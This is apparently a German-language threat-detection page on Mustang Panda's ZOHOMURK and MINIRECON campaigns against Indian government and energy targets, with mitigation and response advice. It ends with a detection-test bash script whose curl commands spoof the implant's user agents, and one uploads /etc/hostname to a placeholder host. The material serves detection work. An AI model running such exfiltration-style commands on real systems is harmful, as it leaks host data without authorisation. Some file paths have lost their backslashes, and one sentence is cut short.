SOC Prime Bias: Hoch

06 Jul 2026 21:57 UTC

Mustang Panda setzt ZOHOMURK und MINIRECON gegen Indiens Regierungs- und Energiesektor ein

Author Photo
SOC Prime Team linkedin icon Folgen
Mustang Panda setzt ZOHOMURK und MINIRECON gegen Indiens Regierungs- und Energiesektor ein
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Mustang Panda führt Spionageoperationen durch, die auf die indische Regierung und den Wasserkraftsektor abzielen. Die Gruppe verwendet ein aktualisiertes Malware-Toolkit, das SHARDLOADER, MINIRECON und ZOHOMURK umfasst. Eine ihrer bemerkenswerten Techniken ist der Missbrauch von Zoho WorkDrive für Command-and-Control und Datenexfiltration.

Untersuchung

Acronis TRU identifizierte zwei parallele Kampagnen, die Spear-Phishing-Köder in Bezug auf die Indien-Taiwan-Kooperation verwendeten. Forscher fanden DLL-Sideloading durch legitime Solid PDF Creator-Binärdateien und analysierten die neuen ZOHOMURK- und MINIRECON-Implantate. Die Untersuchung wurde auch in Zusammenarbeit mit CERT-In durchgeführt, um defensive Maßnahmen zu unterstützen.

Minderung

Organisationen sollten ungewöhnliche Aktivitäten mit Cloud-Plattformen überwachen, insbesondere die unautorisierte Nutzung von Zoho WorkDrive. EDR- und XDR-Lösungen sollten konfiguriert werden, um DLL-Sideloading und verdächtige Registry-basierte Persistenz zu erkennen. Einblick in Nicht-Browser-Prozesse, die HTTPS- oder WebSocket-Verbindungen zu Cloud-Diensten herstellen, ist ebenfalls essentiell.

Reaktion

Wird diese Aktivität festgestellt, sollten betroffene Systeme sofort isoliert werden, um weitere Exfiltration durch Cloud-APIs zu stoppen. Ermittler sollten eine forensische Analyse der Staging-Pfade wie C:ProgramDataIDMlogs or %LOCALAPPDATA%MicrosoftVaultCache. Registry-Run-Schlüssel und geplante Aufgaben sollten ebenfalls auf unautorisierte Persistenz überprüft werden.

Angriffsfluss

Simulation Ausführung

Voraussetzung: Der Telemetrie- & Base Line Pre-Flight Check muss bestanden haben.

Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der gegnerischen Technik (TTP), die darauf ausgelegt ist, die Erkennungsregel auszulösen. Die Befehle und die Erzählung MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die von der Erkennungslogik erwartete genaue Telemetrie zu generieren. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.

  • Angriffserzählung & Befehle: Der Gegner hat erfolgreich einen Fuß gefasst und versucht, Command-and-Control (C2)-Kommunikation einzuleiten. Um sich als legitimen Geschäftsdatenverkehr zu tarnen, versucht das ZOHOMURK-Implantat, mit seinem Controller zu kommunizieren, indem es Zoho WorkDrive-API-Aufrufe imitiert. Der Angreifer verwendet eine spezifische, hartkodierte User-Agent-Zeichenkette (Zoho Client/1.0), um bestimmte Netzfilter zu passieren und hofft, sich in legitimen Cloud-Produktivitätsdatenverkehr einzufügen. Diese Aktion wird einen Proxy-Logeintrag mit dem Ziel-User-Agent erzeugen, wodurch die Erkennungsregel ausgelöst wird.

  • Regressionstestskript:

    #!/bin/bash
    # Simulation von ZOHOMURK C2 über User-Agent-Spoofing
    # Ziel 1: Imitation von Zoho Client
    echo "[+] Simulation von ZOHOMURK: Zoho Client/1.0"
    curl -A "Zoho Client/1.0" http://example.com/api/v1/sync
    
    # Ziel 2: Imitation von IPFetcher
    echo "[+] Simulation von ZOHOMURK: IPFetcher/1.0"
    curl -A "IPFetcher/1.0" http://example.com/checkip
    
    # Ziel 3: Imitation von Multipart POST User-Agent
    echo "[+] Simulation von ZOHOMURK: Multipart POST"
    curl -X POST -A "Multipart POST" -F "data=@/etc/hostname" http://example.com/upload
  • Bereinigungskommandos:

    # Durch diese netzwerkbasierte Simulation werden keine persistenten Artefakte auf dem System erstellt.
    # Stellen Sie einfach sicher, dass keine Hintergrund-curl-Prozesse laufen.
    pkill curl